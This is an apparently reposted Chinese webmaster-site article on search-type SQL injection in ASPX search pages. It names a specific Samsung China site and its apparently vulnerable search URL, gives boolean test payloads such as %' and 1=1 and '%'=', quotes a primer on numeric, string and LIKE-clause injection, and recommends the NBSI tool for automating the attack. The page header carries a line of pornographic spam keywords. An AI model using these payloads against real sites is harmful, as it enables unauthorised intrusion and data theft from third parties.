亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長(zhǎng)網(wǎng)

17站長(zhǎng)網(wǎng) 首頁(yè) 安全 安全教程 查看內(nèi)容

ASPX搜索型注入

2022-9-24 10:23| 查看: 2400 |來(lái)源: 互聯(lián)網(wǎng)

今天看到有個(gè)關(guān)于搜索型注入的文章,用到的是一種新技術(shù),探測(cè)的是三星:http://notebook.samsung.com.cn/index.aspx 注入方式是: 一般網(wǎng)站的搜索都是 ...

今天看到有個(gè)關(guān)于搜索型注入的文章,用到的是一種新技術(shù),探測(cè)的是三星:http://notebook.samsung.com.cn/index.aspx

注入方式是:

一般網(wǎng)站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC=
構(gòu)造注入語(yǔ)句 三星%’and 1=1 and ’%’=’  
             三星%’and 1=2 and ’%’=’

大家看到了吧 兩個(gè)返回頁(yè)面是不一樣的 說(shuō)明有注入的漏洞 特征字 寫(xiě) 筆記本 就是三星%’and 1=1 and ’%’=’ 返回時(shí)有的


我們知道一般搜索代碼是這么寫(xiě)的:

Select * from 表名 where 字段 like ’%關(guān)鍵字%’

這樣就造成了對(duì)關(guān)鍵字前后的所有匹配(%是用來(lái)全部匹配的)

這里如果關(guān)鍵字沒(méi)有過(guò)濾的話(huà),就可以這樣來(lái)構(gòu)造:

關(guān)鍵字=’ and [查詢(xún)條件] and ‘%’=’

這樣查詢(xún)就變成

select * from 表名 where 字段 like ’%’ and 1=1 and ’%’=’%’

這樣就很好的構(gòu)成了一個(gè)sql注入點(diǎn),當(dāng)然用手工也可以,用nbsi也可以~~

注入是不分家的,沒(méi)必要什么型什么型的!~

如果不信,大家請(qǐng)看下面的《sql注入天書(shū)》的原話(huà)

第一節(jié)、SQL注入的一般步驟

首先,判斷環(huán)境,尋找注入點(diǎn),判斷數(shù)據(jù)庫(kù)類(lèi)型,這在入門(mén)篇已經(jīng)講過(guò)了。

其次,根據(jù)注入?yún)?shù)類(lèi)型,在腦海中重構(gòu)SQL語(yǔ)句的原貌,按參數(shù)類(lèi)型主要分為下面三種:

(A)   ID=49 這類(lèi)注入的參數(shù)是數(shù)字型,SQL語(yǔ)句原貌大致如下:
Select * from 表名 where 字段=49
注入的參數(shù)為ID=49 And [查詢(xún)條件],即是生成語(yǔ)句:
Select * from 表名 where 字段=49 And [查詢(xún)條件]


(B) Class=連續(xù)劇 這類(lèi)注入的參數(shù)是字符型,SQL語(yǔ)句原貌大致概如下:
Select * from 表名 where 字段=’連續(xù)劇’  
注入的參數(shù)為Class=連續(xù)劇’ and [查詢(xún)條件] and ‘’=’ ,即是生成語(yǔ)句:
Select * from 表名 where 字段=’連續(xù)劇’ and [查詢(xún)條件] and ‘’=’’

(C) 搜索時(shí)沒(méi)過(guò)濾參數(shù)的,如keyword=關(guān)鍵字,SQL語(yǔ)句原貌大致如下:
Select * from 表名 where 字段like ’%關(guān)鍵字%’  
注入的參數(shù)為keyword=’ and [查詢(xún)條件] and ‘%’=’, 即是生成語(yǔ)句:
Select * from 表名 where字段like ’%’ and [查詢(xún)條件] and ‘%’=’%’


當(dāng)然手工是麻煩的

用工具的話(huà),我建議用nbsi的工具比較好,就我感覺(jué)只有nbsi結(jié)合了這個(gè)技術(shù),用別的軟體是不能注入的

注入點(diǎn)只要寫(xiě):

http://notebook.samsung.com.cn/news/news.aspx?& ... &ST=title&SC=%

再加個(gè)特征字符就可以了

tag標(biāo)簽:ASPX 搜索型 注入
本文最后更新于 2022-9-24 10:23,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請(qǐng)?jiān)诰W(wǎng)站留言或聯(lián)系站長(zhǎng):17tui@17tui.com
·END·
站長(zhǎng)網(wǎng)微信號(hào):w17tui,關(guān)注站長(zhǎng)、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營(yíng)銷(xiāo)服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來(lái)自用戶(hù)投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長(zhǎng)網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷(xiāo)服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信

大家都在看

    熱門(mén)排行

      最近更新

        返回頂部